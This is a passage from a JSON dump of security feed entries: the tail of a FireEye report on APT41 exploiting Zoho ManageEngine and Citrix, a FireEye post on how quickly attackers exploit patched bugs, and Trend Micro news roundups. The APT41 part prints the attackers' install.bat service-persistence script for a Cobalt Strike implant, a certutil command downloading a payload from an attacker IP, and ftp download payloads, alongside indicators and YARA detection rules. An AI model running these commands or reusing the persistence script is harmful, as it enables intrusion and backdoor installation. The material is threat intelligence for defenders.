\"WORK_DIR=C:\\Windows\\System32\"\n\nset \"DLL_NAME=storesyncsvc.dll\"\n\nset \"SERVICE_NAME=StorSyncSvc\"\n\nset \"DISPLAY_NAME=Storage Sync Service\"\n\nset \"DESCRIPTION=The Storage Sync Service is the top-level resource for File Sync. It creates sync relationships with multiple storage accounts via multiple sync groups. If this service is stopped or disabled, applications will be unable to run collectly.\"\n\nsc stop %SERVICE_NAME%\n\nsc delete %SERVICE_NAME%\n\nmkdir %WORK_DIR%\n\ncopy \"%~dp0%DLL_NAME%\" \"%WORK_DIR%\" /Y\n\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\" /v \"%SERVICE_NAME%\" /t REG_MULTI_SZ /d \"%SERVICE_NAME%\" /f\n\nsc create \"%SERVICE_NAME%\" binPath= \"%SystemRoot%\\system32\\svchost.exe -k %SERVICE_NAME%\" type= share start= auto error= ignore DisplayName= \"%DISPLAY_NAME%\"\n\nSC failure \"%SERVICE_NAME%\" reset= 86400 actions= restart/60000/restart/60000/restart/60000\n\nsc description \"%SERVICE_NAME%\" \"%DESCRIPTION%\"\n\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\%SERVICE_NAME%\\Parameters\" /f\n\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\%SERVICE_NAME%\\Parameters\" /v \"ServiceDll\" /t REG_EXPAND_SZ /d \"%WORK_DIR%\\%DLL_NAME%\" /f\n\nnet start \"%SERVICE_NAME%\" \n \n--- \n \nFigure 8: Contents of install.bat\n\nStoresyncsvc.dll was a Cobalt Strike BEACON implant (trial-version) which connected to exchange.dumb1[.]com (with a DNS resolution of 74.82.201[.]8) using a jquery malleable command and control (C2) profile.\n\nGET /jquery-3.3.1.min.js HTTP/1.1 \nHost: cdn.bootcss.com \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nReferer: http://cdn.bootcss.com/ \nAccept-Encoding: gzip, deflate \nCookie: __cfduid=CdkIb8kXFOR_9Mn48DQwhIEuIEgn2VGDa_XZK_xAN47OjPNRMpJawYvnAhPJYM \nDA8y_rXEJQGZ6Xlkp_wCoqnImD-bj4DqdTNbj87Rl1kIvZbefE3nmNunlyMJZTrDZfu4EV6oxB8yKMJfLXydC5YF9OeZwqBSs3Tun12BVFWLI \nUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko \nConnection: Keep-Alive Cache-Control: no-cache \n \n--- \n \nFigure 9: Example APT41 Cobalt Strike BEACON jquery malleable C2 profile HTTP request\n\nWithin a few hours of initial exploitation, APT41 used the storescyncsvc.dll BEACON backdoor to download a secondary backdoor with a different C2 address that uses Microsoft CertUtil, a common TTP that we\u2019ve observed APT41 use in past intrusions, which they then used to download 2.exe (MD5: 3e856162c36b532925c8226b4ed3481c). The file 2.exe was a VMProtected Meterpreter downloader used to download Cobalt Strike BEACON shellcode. The usage of VMProtected binaries is another very common TTP that we\u2019ve observed this group leverage in multiple intrusions in order to delay analysis of other tools in their toolkit.\n\nGET /2.exe HTTP/1.1 \nCache-Control: no-cache \nConnection: Keep-Alive \nPragma: no-cache \nAccept: */* \nUser-Agent: Microsoft-CryptoAPI/6.3 \nHost: 91.208.184[.]78 \n \n--- \n \nFigure 10: Example HTTP request downloading \u20182.exe\u2019 VMProtected Meterpreter downloader via CertUtil\n\ncertutil -urlcache -split -f http://91.208.184[.]78/2.exe \n \n--- \n \nFigure 11: Example CertUtil command to download \u20182.exe\u2019 VMProtected Meterpreter downloader\n\nThe Meterpreter downloader \u2018TzGG\u2019 was configured to communicate with 91.208.184[.]78 over port 443 to download the shellcode (MD5: 659bd19b562059f3f0cc978e15624fd9) for Cobalt Strike BEACON (trial-version).\n\nGET /TzGG HTTP/1.1 \nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0) \nHost: 91.208.184[.]78:443 \nConnection: Keep-Alive \nCache-Control: no-cache \n \n--- \n \nFigure 12: Example HTTP request downloading \u2018TzGG\u2019 shellcode for Cobalt Strike BEACON\n\nThe downloaded BEACON shellcode connected to the same C2 server: 91.208.184[.]78. We believe this is an example of the actor attempting to diversify post-exploitation access to the compromised systems.\n\nManageEngine released a short term [mitigation](<https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html>) for CVE-2020-10189 on January 20, 2020, and subsequently released an [update](<https://www.manageengine.com/products/desktop-central/rce-vulnerability-cve-2020-10189.html?utm_source=rce-kb>) on March 7, 2020, with a long term fix.\n\n#### Outlook\n\nThis activity is one of the most widespread campaigns we have seen from China-nexus espionage actors in recent years. While APT41 has previously conducted activity with an extensive initial entry such as the trojanizing of NetSarang software, this scanning and exploitation _has focused on a subset of our customers_, and seems to reveal a high operational tempo and wide collection requirements for APT41.\n\nIt is notable that we have only seen these exploitation attempts leverage publicly available malware such as Cobalt Strike and Meterpreter. While these backdoors are full featured, in previous incidents APT41 has waited to deploy more advanced malware until they have fully understood where they were and carried out some initial reconnaissance. In 2020, APT41 continues to be one of the most prolific threats that FireEye currently tracks. This new activity from this group shows how resourceful and how quickly they can leverage newly disclosed vulnerabilities to their advantage.\n\nPreviously, FireEye Mandiant Managed Defense identified APT41 successfully leverage CVE-2019-3396 (Atlassian Confluence) against a U.S. based university. While APT41 is a [unique](<https://content.fireeye.com/apt-41/rpt-apt41/>) state-sponsored Chinese threat group that conducts espionage, the actor also conducts financially motivated activity for personal gain.\n\n#### Indicators\n\nType\n\n| \n\nIndicator(s) \n \n---|--- \n \nCVE-2019-19781 Exploitation (Citrix Application Delivery Control)\n\n| \n\n66.42.98[.]220\n\nCVE-2019-19781 exploitation attempts with a payload of \u2018file /bin/pwd\u2019\n\nCVE-2019-19781 exploitation attempts with a payload of \u2018/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\\@66.42.98[.]220/bsd\u2019\n\nCVE-2019-19781 exploitation attempts with a payload of \u2018/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\\@66.42.98[.]220/un\u2019\n\n/tmp/bsd\n\n/tmp/un \n \nCisco Router Exploitation\n\n| \n\n66.42.98\\\\.220\n\n\u20181.txt\u2019 (MD5: c0c467c8e9b2046d7053642cc9bdd57d)\n\n\u2018fuc\u2019 (MD5: 155e98e5ca8d662fad7dc84187340cbc \n \nCVE-2020-10189 (Zoho ManageEngine Desktop Central)\n\n| \n\n66.42.98[.]220\n\n91.208.184[.]78\n\n74.82.201[.]8\n\nexchange.dumb1[.]com\n\ninstall.bat (MD5: 7966c2c546b71e800397a67f942858d0)\n\nstoresyncsvc.dll (MD5: 5909983db4d9023e4098e56361c96a6f)\n\nC:\\Windows\\Temp\\storesyncsvc.dll\n\nC:\\Windows\\Temp\\install.bat\n\n2.exe (MD5: 3e856162c36b532925c8226b4ed3481c)\n\nC:\\Users\\\\[redacted]\\install.bat\n\nTzGG (MD5: 659bd19b562059f3f0cc978e15624fd9)\n\nC:\\ManageEngine\\DesktopCentral_Server\\jre\\bin\\java.exe spawning cmd.exe and/or bitsadmin.exe\n\nCertutil.exe downloading 2.exe and/or payloads from 91.208.184[.]78\n\nPowerShell downloading files with Net.WebClient \n \n#### Detecting the Techniques\n\nFireEye detects this activity across our platforms. This table contains several specific detection names from a larger list of detections that were available prior to this activity occurring.\n\nPlatform\n\n| \n\nSignature Name \n \n---|--- \n \nEndpoint Security\n\n| \n\nBITSADMIN.EXE MULTISTAGE DOWNLOADER (METHODOLOGY)\n\nCERTUTIL.EXE DOWNLOADER A (UTILITY)\n\nGeneric.mg.5909983db4d9023e\n\nGeneric.mg.3e856162c36b5329\n\nPOWERSHELL DOWNLOADER (METHODOLOGY)\n\nSUSPICIOUS BITSADMIN USAGE B (METHODOLOGY)\n\nSAMWELL (BACKDOOR)\n\nSUSPICIOUS CODE EXECUTION FROM ZOHO MANAGE ENGINE (EXPLOIT) \n \nNetwork Security\n\n| \n\nBackdoor.Meterpreter\n\nDTI.Callback\n\nExploit.CitrixNetScaler\n\nTrojan.METASTAGE\n\nExploit.ZohoManageEngine.CVE-2020-10198.Pwner\n\nExploit.ZohoManageEngine.CVE-2020-10198.mdmLogUploader \n \nHelix\n\n| \n\nCITRIX ADC [Suspicious Commands] \nEXPLOIT - CITRIX ADC [CVE-2019-19781 Exploit Attempt] \nEXPLOIT - CITRIX ADC [CVE-2019-19781 Exploit Success] \nEXPLOIT - CITRIX ADC [CVE-2019-19781 Payload Access] \nEXPLOIT - CITRIX ADC [CVE-2019-19781 Scanning] \nMALWARE METHODOLOGY [Certutil User-Agent] \nWINDOWS METHODOLOGY [BITSadmin Transfer] \nWINDOWS METHODOLOGY [Certutil Downloader] \n \n#### MITRE ATT&amp;CK Technique Mapping\n\nATT&amp;CK\n\n| \n\nTechniques \n \n---|--- \n \nInitial Access\n\n| \n\nExternal Remote Services (T1133), Exploit Public-Facing Application (T1190) \n \nExecution\n\n| \n\nPowerShell (T1086), Scripting (T1064) \n \nPersistence\n\n| \n\nNew Service (T1050) \n \nPrivilege Escalation\n\n| \n\nExploitation for Privilege Escalation (T1068) \n \nDefense Evasion\n\n| \n\nBITS Jobs (T1197), Process Injection (T1055) \n \nCommand And Control\n\n| \n\nRemote File Copy (T1105), Commonly Used Port (T1436), Uncommonly Used Port (T1065), Custom Command and Control Protocol (T1094), Data Encoding (T1132), Standard Application Layer Protocol (T1071) \n \n#### Appendix A: Discovery Rules\n\nThe following Yara rules serve as examples of discovery rules for APT41 actor TTPs, turning the adversary methods or tradecraft into new haystacks for purposes of detection or hunting. For all tradecraft-based discovery rules, we recommend deliberate testing and tuning prior to implementation in any production system. Some of these rules are tailored to build concise haystacks that are easy to review for high-fidelity detections. Some of these rules are broad in aperture that build larger haystacks for further automation or processing in threat hunting systems.\n\nimport \"pe\"\n\nrule ExportEngine_APT41_Loader_String\n\n{\n\nmeta:\n\nauthor = \"@stvemillertime\"\n\ndescription \"This looks for a common APT41 Export DLL name in BEACON shellcode loaders, such as loader_X86_svchost.dll\"\n\nstrings:\n\n$pcre = /loader_[\\x00-\\x7F]{1,}\\x00/\n\ncondition:\n\nuint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))\n\n}\n\nrule ExportEngine_ShortName\n\n{\n\nmeta:\n\nauthor = \"@stvemillertime\"\n\ndescription = \"This looks for Win PEs where Export DLL name is a single character\"\n\nstrings:\n\n$pcre = /[A-Za-z0-9]{1}\\\\.(dll|exe|dat|bin|sys)/\n\ncondition:\n\nuint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))\n\n}\n\nrule ExportEngine_xArch\n\n{\n\nmeta:\n\nauthor = \"@stvemillertime\"\n\ndescription = \"This looks for Win PEs where Export DLL name is a something like x32.dat\"\n\nstrings:\n\n$pcre = /[\\x00-\\x7F]{1,}x(32|64|86)\\\\.dat\\x00/\n\ncondition:\n\nuint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))\n\n}\n\nrule RareEquities_LibTomCrypt\n\n{\n\nmeta:\n\nauthor = \"@stvemillertime\"\n\ndescription = \"This looks for executables with strings from LibTomCrypt as seen by some APT41-esque actors https://github.com/libtom/libtomcrypt - might catch everything BEACON as well. You may want to exclude Golang and UPX packed samples.\"\n\nstrings:\n\n$a1 = \"LibTomMath\"\n\ncondition:\n\nuint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $a1\n\n}\n\nrule RareEquities_KCP\n\n{\n\nmeta:\n\nauthor = \"@stvemillertime\"\n\ndescription = \"This is a wide catchall rule looking for executables with equities for a transport library called KCP, https://github.com/skywind3000/kcp Matches on this rule may have built-in KCP transport ability.\"\n\nstrings:\n\n$a01 = \"[RO] %ld bytes\"\n\n$a02 = \"recv sn=%lu\"\n\n$a03 = \"[RI] %d bytes\"\n\n$a04 = \"input ack: sn=%lu rtt=%ld rto=%ld\"\n\n$a05 = \"input psh: sn=%lu ts=%lu\"\n\n$a06 = \"input probe\"\n\n$a07 = \"input wins: %lu\"\n\n$a08 = \"rcv_nxt=%lu\\\\\\n\"\n\n$a09 = \"snd(buf=%d, queue=%d)\\\\\\n\"\n\n$a10 = \"rcv(buf=%d, queue=%d)\\\\\\n\"\n\n$a11 = \"rcvbuf\"\n\ncondition:\n\n(uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize &lt; 5MB and 3 of ($a*)\n\n}\n\nrule ConventionEngine_Term_Users\n\n{\n\nmeta:\n\nauthor = \"@stvemillertime\"\n\ndescription = \"Searching for PE files with PDB path keywords, terms or anomalies.\"\n\nsample_md5 = \"09e4e6fa85b802c46bc121fcaecc5666\"\n\nref_blog = \"https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html\"\n\nstrings:\n\n$pcre = /RSDS[\\x00-\\xFF]{20}[a-zA-Z]:\\\\\\\\[\\x00-\\xFF]{0,200}Users[\\x00-\\xFF]{0,200}\\\\.pdb\\x00/ nocase ascii\n\ncondition:\n\n(uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre\n\n}\n\nrule ConventionEngine_Term_Desktop\n\n{\n\nmeta:\n\nauthor = \"@stvemillertime\"\n\ndescription = \"Searching for PE files with PDB path keywords, terms or anomalies.\"\n\nsample_md5 = \"71cdba3859ca8bd03c1e996a790c04f9\"\n\nref_blog = \"https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html\"\n\nstrings:\n\n$pcre = /RSDS[\\x00-\\xFF]{20}[a-zA-Z]:\\\\\\\\[\\x00-\\xFF]{0,200}Desktop[\\x00-\\xFF]{0,200}\\\\.pdb\\x00/ nocase ascii\n\ncondition:\n\n(uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre\n\n}\n\nrule ConventionEngine_Anomaly_MultiPDB_Double\n\n{\n\nmeta:\n\nauthor = \"@stvemillertime\"\n\ndescription = \"Searching for PE files with PDB path keywords, terms or anomalies.\"\n\nsample_md5 = \"013f3bde3f1022b6cf3f2e541d19353c\"\n\nref_blog = \"https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html\"\n\nstrings:\n\n$pcre = /RSDS[\\x00-\\xFF]{20}[a-zA-Z]:\\\\\\\\[\\x00-\\xFF]{0,200}\\\\.pdb\\x00/\n\ncondition:\n\n(uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and #pcre == 2\n\n} \n \n---\n", "modified": "2020-03-25T12:00:00", "published": "2020-03-25T12:00:00", "id": "FIREEYE:BFB36D22F20651C632D25AA20588E904", "href": "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", "type": "fireeye", "title": "This Is\u00a0Not a Test: APT41 Initiates Global Intrusion Campaign Using\nMultiple Exploits", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-23T01:38:39", "bulletinFamily": "info", "cvelist": ["CVE-2010-1871", "CVE-2012-0874", "CVE-2018-0101", "CVE-2018-0296", "CVE-2018-11776", "CVE-2018-15982", "CVE-2018-20250", "CVE-2018-2628", "CVE-2018-2893", "CVE-2018-4878", "CVE-2018-7600", "CVE-2018-7602", "CVE-2018-8440", "CVE-2019-0863", "CVE-2019-3396", "CVE-2019-6340"], "description": "_One of the critical strategic and tactical roles that cyber threat intelligence (CTI) plays is in the tracking, analysis, and prioritization of software vulnerabilities that could potentially put an organization\u2019s data, employees and customers at risk. In this four-part blog series, FireEye Mandiant Threat Intelligence highlights the value of CTI in enabling vulnerability management, and unveils new research into the latest threats, trends and recommendations. Check out our first post on zero-day vulnerabilities._\n\nAttackers are in a constant race to exploit newly discovered vulnerabilities before defenders have a chance to respond. FireEye Mandiant Threat Intelligence research into vulnerabilities exploited in 2018 and 2019 suggests that the majority of exploitation in the wild occurs before patch issuance or within a few days of a patch becoming available.\n\n \nFigure 1: Percentage of vulnerabilities exploited at various times in relation to patch release\n\nFireEye Mandiant Threat Intelligence analyzed 60 vulnerabilities that were either exploited or assigned a CVE number between Q1 2018 to Q3 2019. The majority of vulnerabilities were exploited as zero-days \u2013 before a patch was available. More than a quarter were exploited within one month after the patch date. Figure 2 illustrates the number of days between when a patch was made available and the first observed exploitation date for each vulnerability.\n\nWe believe these numbers to be conservative estimates, as we relied on the first reported exploitation of a vulnerability linked to a specific date. Frequently, first exploitation dates are not publicly disclosed. It is also likely that in some cases exploitation occurred without being discovered before researchers recorded exploitation attached to a certain date.\n\n \nFigure 2: Time between vulnerability exploitation and patch issuance\n\n\u00ad\u00ad\u00ad_Time Between Disclosure and Patch Release_\n\nThe average time between disclosure and patch availability was approximately 9 days. This average is slightly inflated by vulnerabilities such as CVE-2019-0863, a Microsoft Windows server vulnerability, which was disclosed in December 2018 and not patched until 5 months later in May 2019. The majority of these vulnerabilities, however, were patched quickly after disclosure. In 59% of cases, a patch was released on the same day the vulnerability was disclosed. These metrics, in combination with the observed swiftness of adversary exploitation activity, highlight the importance of responsible disclosure, as it may provide defenders with the slim window needed to successfully patch vulnerable systems.\n\n_Exploitation After Patch Release_\n\nWhile the majority of the observed vulnerabilities were zero-days, 42 percent of vulnerabilities were exploited after a patch had been released. For these non-zero-day vulnerabilities, there was a very small window (often only hours or a few days) between when the patch was released and the first observed instance of attacker exploitation. Table 1 provides some insight into the race between attackers attempting to exploit vulnerable software and organizations attempting to deploy the patch.\n\n**Time to Exploit for Vulnerabilities First Exploited after a Patch** \n \n--- \n \nHours\n\n| \n\nTwo vulnerabilities were successfully exploited within hours of a patch release, CVE-2018-2628 and CVE-2018-7602. \n \nDays\n\n| \n\n12 percent of vulnerabilities were exploited within the first week following the patch release. \n \nOne Month\n\n| \n\n15 percent of vulnerabilities were exploited after one week but within one month of patch release. \n \nYears\n\n| \n\nIn multiple cases, such as the first observed exploitation of CVE-2010-1871 and CVE-2012-0874 in 2019, attackers exploited vulnerabilities for which a patch had been made available many years prior. \n \nTable 1: Exploitation timing for patched vulnerabilities ranges from within hours of patch issuance to years after initial disclosure\n\n#### Case Studies\n\nWe continue to observe espionage and financially motivated groups quickly leveraging publicly disclosed vulnerabilities in their operations. The following examples demonstrate the speed with which sophisticated groups are able to incorporate vulnerabilities into their toolsets following public disclosure and the fact that multiple disparate groups have repeatedly leveraged the same vulnerabilities in independent campaigns. Successful operations by these types of groups are likely to have a high potential impact.\n\n \nFigure 3: Timeline of activity for CVE-2018-15982\n\nCVE-2018-15982: A use after free vulnerability in a file package in Adobe Flash Player 31.0.0.153 and earlier that, when exploited, allows an attacker to remotely execute arbitrary code. This vulnerability was exploited by espionage groups\u2014Russia's APT28 and North Korea's APT37\u2014as well as TEMP.MetaStrike and other financially motivated attackers.\n\n \nFigure 4: Timeline of activity for CVE-2018-20250\n\nCVE-2018-20250: A path traversal vulnerability exists within the ACE format in the archiver tool WinRAR versions 5.61 and earlier that, when exploited, allows an attacker to locally execute arbitrary code. This vulnerability was exploited by multiple espionage groups, including Chinese, North Korean, and Russian, groups, as well as Iranian groups APT33 and TEMP.Zagros.\n\n \nFigure 5: Timeline of Activity for CVE-2018-4878\n\nCVE-2018-4878: A use after free vulnerability exists within the DRMManager\u2019s \u201cinitialize\u201d call in Adobe Flash Player 28.0.0.137 and earlier that, when exploited, allows an attacker to remotely execute arbitrary code. Mandiant Intelligence confirmed that North Korea\u2019s APT37 exploited this vulnerability as a zero-day as early as September 3, 2017. Within 8 days of disclosure, we observed Russia\u2019s APT28 also leverage this vulnerability, with financially motivated attackers and North Korea\u2019s TEMP.Hermit also using within approximately a month of disclosure.\n\n#### Availability of PoC or Exploit Code\n\nThe availability of POC or exploit code on its own does not always increase the probability or speed of exploitation. However, we believe that POC code likely hastens exploitation attempts for vulnerabilities that do not require user interaction. For vulnerabilities that have already been exploited, the subsequent introduction of publicly available exploit or POC code indicates malicious actor interest and makes exploitation accessible to a wider range of attackers. There were a number of cases in which certain vulnerabilities were exploited on a large scale within 48 hours of PoC or exploit code availability (Table 2).\n\n**Time Between PoC or Exploit Code Publication and First Observed Potential Exploitation Events**\n\n| \n\n**Product**\n\n| \n\n**CVE**\n\n| \n\n**FireEye Risk Rating** \n \n---|---|---|--- \n \n1 day\n\n| \n\nWinRAR\n\n| \n\nCVE-2018-20250\n\n| \n\nMedium \n \n1 day\n\n| \n\nDrupal\n\n| \n\nCVE-2018-7600\n\n| \n\nHigh \n \n1 day\n\n| \n\nCisco Adaptive Security Appliance\n\n| \n\nCVE-2018-0296\n\n| \n\nMedium \n \n2 days\n\n| \n\nApache Struts\n\n| \n\nCVE-2018-11776\n\n| \n\nHigh \n \n2 days\n\n| \n\nCisco Adaptive Security Appliance\n\n| \n\nCVE-2018-0101\n\n| \n\nHigh \n \n2 days\n\n| \n\nOracle WebLogic Server\n\n| \n\nCVE-2018-2893\n\n| \n\nHigh \n \n2 days\n\n| \n\nMicrosoft Windows Server\n\n| \n\nCVE-2018-8440\n\n| \n\nMedium \n \n2 days\n\n| \n\nDrupal\n\n| \n\nCVE-2019-6340\n\n| \n\nMedium \n \n2 days\n\n| \n\nAtlassian Confluence\n\n| \n\nCVE-2019-3396\n\n| \n\nHigh \n \nTable 2: Vulnerabilities exploited within two days of either PoC or exploit code being made publicly available, Q1 2018\u2013Q3 2019\n\n#### Trends by Targeted Products\n\nFireEye judges that malicious actors are likely to most frequently leverage vulnerabilities based on a variety of factors that influence the utility of different vulnerabilities to their specific operations. For instance, we believe that attackers are most likely to target the most widely used products (see Figure 6). Attackers almost certainly also consider the cost and availability of an exploit for a specific vulnerability, the perceived success rate based on the delivery method, security measures introduced by vendors, and user awareness around certain products.\n\nThe majority of observed vulnerabilities were for Microsoft products, likely due to the ubiquity of Microsoft offerings. In particular, vulnerabilities in software such as Microsoft Office Suite may be appealing to malicious actors based on the utility of email attached documents as initial infection vectors in phishing campaigns.\n\n \nFigure 6: Exploited vulnerabilities by vendor, Q1 2018\u2013Q3 2019\n\n#### Outlook and Implications\n\nThe speed with which attackers exploit patched vulnerabilities emphasizes the importance of patching as quickly as possible. With the sheer quantity of vulnerabilities disclosed each year, however, it can be difficult for organizations with limited resources and business constraints to implement an effective strategy for prioritizing the most dangerous vulnerabilities. In upcoming blog posts, FireEye Mandiant Threat Intelligence describes our approach to vulnerability risk rating as well as strategies for making informed and realistic patch management decisions in more detail.\n\nWe recommend using this exploitation trend information to better prioritize patching schedules in combination with other factors, such as known active threats to an organization's industry and geopolitical context, the availability of exploit and PoC code, commonly impacted vendors, and how widely software is deployed in an organization's environment may help to mitigate the risk of a large portion of malicious activity.\n\nRegister today to hear FireEye Mandiant Threat Intelligence experts discuss the latest in [vulnerability threats, trends and recommendations](<https://www.brighttalk.com/webcast/7451/392772>) in our upcoming April 30 webinar.\n", "modified": "2020-04-13T12:00:00", "published": "2020-04-13T12:00:00", "id": "FIREEYE:3CF3A3DF17A5FD20D5E05C24F6DBC54B", "href": "https://www.fireeye.com/blog/threat-research/2020/04/time-between-disclosure-patch-release-and-vulnerability-exploitation.html", "type": "fireeye", "title": "Think Fast: Time Between Disclosure, Patch Release and Vulnerability\nExploitation \u2014 Intelligence for Vulnerability Management, Part Two", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "trendmicroblog": [{"lastseen": "2019-05-29T16:28:31", "bulletinFamily": "blog", "cvelist": ["CVE-2019-3396"], "description": "\n\nWelcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn how credit card skimming attacks can impact businesses and how ransomware can use software installations to help hide malicious activities.\n\nRead on:\n\n**[Mirrorthief Group Uses Magecart Skimming Attack to Hit Hundreds of Campus Online Stores in US and Canada](<https://blog.trendmicro.com/trendlabs-security-intelligence/mirrorthief-group-uses-magecart-skimming-attack-to-hit-hundreds-of-campus-online-stores-in-us-and-canada/>)**\n\n_Trend Micro uncovered recent activity by hacking group Mirrorthief involving the notorious online credit card skimming attack known as Magecart, which impacted 201 online campus stores in the United States and Canada._\n\n**[Hackers Steal $40.7 Million in Bitcoin from Crypto Exchange Binance](<https://www.coindesk.com/hackers-steal-40-7-million-in-bitcoin-from-crypto-exchange-binance>)**\n\n_Hackers stole more than 7,000 bitcoin from crypto exchange Binance and were able to access user API keys, two-factor authentication codes and other information to withdraw $41 million in bitcoin from the exchange._\n\n**[Cyberattack Cripples Baltimore's Government Computer Servers](<https://abcnews.go.com/US/wireStory/cyberattack-cripples-baltimores-government-computer-servers-62888773>)**\n\n_Baltimore's government rushed to shut down most of its computer servers after its network was hit by a ransomware virus, though officials believe it has not touched critical public safety systems. _\n\n**[Dharma Ransomware Uses AV Tool to Distract from Malicious Activities](<https://blog.trendmicro.com/trendlabs-security-intelligence/dharma-ransomware-uses-av-tool-to-distract-from-malicious-activities/>)**\n\n_Trend Micro recently found new samples of Dharma ransomware that are using a new technique: using software installation as a distraction to help hide malicious activities._\n\n**[What Israel\u2019s Strike on Hamas Hackers Means for Cyberwar](<https://www.wired.com/story/israel-hamas-cyberattack-air-strike-cyberwar/>)**\n\n_The Israeli Defense Force claimed that it bombed and partially destroyed one building in Gaza because it was allegedly the base of an active Hamas hacking group._\n\n**[CVE-2019-3396 Redux: Confluence Vulnerability Exploited to Deliver Cryptocurrency Miner with Rootkit](<https://blog.trendmicro.com/trendlabs-security-intelligence/cve-2019-3396-redux-confluence-vulnerability-exploited-to-deliver-cryptocurrency-miner-with-rootkit/>)**\n\n_Trend Micro observed a critical vulnerability involving Confluence that was being exploited by threat actors to perform malicious attacks. _\n\n**[Trump Creates New Cybersecurity Competition with a $25,000 Award](<https://www.rollcall.com/news/congress/trump-creates-new-cybersecurity-competition-with-a-25000-award>)**\n\n_The Trump administration announced steps to address a shortage of cybersecurity workers across the federal government, including sponsorship of a national competition and allowing cyber experts to rotate from one agency to another. _\n\nWhat are your thoughts on hacking groups like Mirrorthief and their impact on businesses and consumers? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: [@JonLClay.](<https://twitter.com/jonlclay>)\n\n_ _\n\nThe post [This Week in Security News: Skimming Attacks and Ransomware](<https://blog.trendmicro.com/this-week-in-security-news-skimming-attacks-and-ransomware/>) appeared first on [](<https://blog.trendmicro.com>).", "modified": "2019-05-10T13:00:42", "published": "2019-05-10T13:00:42", "id": "TRENDMICROBLOG:9FD54B8253FD0053BA014F80A7261833", "href": "https://blog.trendmicro.com/this-week-in-security-news-skimming-attacks-and-ransomware/", "type": "trendmicroblog", "title": "This Week in Security News: Skimming Attacks and Ransomware", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T16:28:31", "bulletinFamily": "blog", "cvelist": ["CVE-2019-3396"], "description": "\n\nWelcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about the prevalence and impact of BEC attacks. Also, find out how botnet malware can perform remote code execution, DDoS attacks and cryptocurrency mining.\n\nRead on:\n\n**[Tech Support Scam Employs New Trick by Using Iframe to Freeze Browsers](<https://blog.trendmicro.com/trendlabs-security-intelligence/tech-support-scam-employs-new-trick-by-using-iframe-to-freeze-browsers/>)**\n\n_Trend Micro discovered a new technical support scam (TSS) campaign that makes use of iframe in combination with basic pop-up authentication to freeze a user\u2019s browser.__ _\n\n**[Cybersecurity Pros Could Work for Multiple Agencies Under Bill Passed by Senate](<https://www.fedscoop.com/federal-rotational-cyber-workforce-program-passes-senate/>)**\n\n_Skilled federal cybersecurity workers could be rotated among civilian agencies under bipartisan legislation the Senate passed to help fill specific gaps in the workforce.__ _\n\n**[New Cybersecurity Report Warns CIOs -- 'If You're Breached Or Hacked, It's Your Own Fault'](<https://www.forbes.com/sites/zakdoffman/2019/05/02/new-cybersecurity-report-warns-cios-if-youre-breached-or-hacked-its-your-own-fault/#79878146fe08>)**\n\n_A new [cybersecurity survey](<https://www.1e.com/getting-your-house-in-order/>) conducted by endpoint management specialists [1E](<https://www.1e.com/>) and technology market researchers [Vanson Bourne](<https://www.vansonbourne.com/>), a survey that questioned 600 IT operations and IT security decision-makers across the U.S. and U.K., and found that 60% of the organizations had been breached in the last two years and 31% had been breached more than once._\n\n**[AESDDoS Botnet Malware Exploits CVE-2019-3396 to Perform Remote Code Execution, DDoS Attacks, and Cryptocurrency Mining](<https://blog.trendmicro.com/trendlabs-security-intelligence/aesddos-botnet-malware-exploits-cve-2019-3396-to-perform-remote-code-execution-ddos-attacks-and-cryptocurrency-mining/>)**\n\n_Trend Micro\u2019s honeypot sensors detected an AESDDoS botnet malware variant exploiting a server-side template injection vulnerability in a collaboration software program used by DevOps professionals.__ _\n\n**[U.K. Prime Minister Theresa May Fires Defense Secretary Gavin Williamson Over Huawei 